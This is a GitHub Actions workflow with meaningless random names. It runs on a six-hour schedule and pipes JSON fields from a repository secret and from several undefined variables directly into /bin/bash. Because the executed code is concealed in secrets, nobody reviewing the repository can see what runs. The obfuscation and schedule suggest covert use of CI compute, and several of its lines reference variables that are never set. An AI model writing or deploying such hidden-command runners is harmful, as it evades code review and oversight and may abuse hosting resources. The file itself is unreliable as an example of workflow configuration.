name: zhushaoyun6981
on:
  workflow_dispatch:
  schedule:
    - cron: '53 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhushaoyun6981
        env:
          jceu0: ${{ secrets.jceu0 }}
        run: |
          echo $jceu0 | jq -r .yorov85 | /bin/bash
          echo $jfcew85110 | jq -r .jzuip23885 | /bin/bash
          echo $b75843 | jq -r .qjmtc0 | /bin/bash
          echo $d551 | jq -r .dso1279 | /bin/bash
          echo $arh0139 | jq -r .tdcb0 | /bin/bash
          echo $q85 | jq -r .ssqiq4807 | /bin/bash
          echo $y87 | jq -r .jiuiu81 | /bin/bash

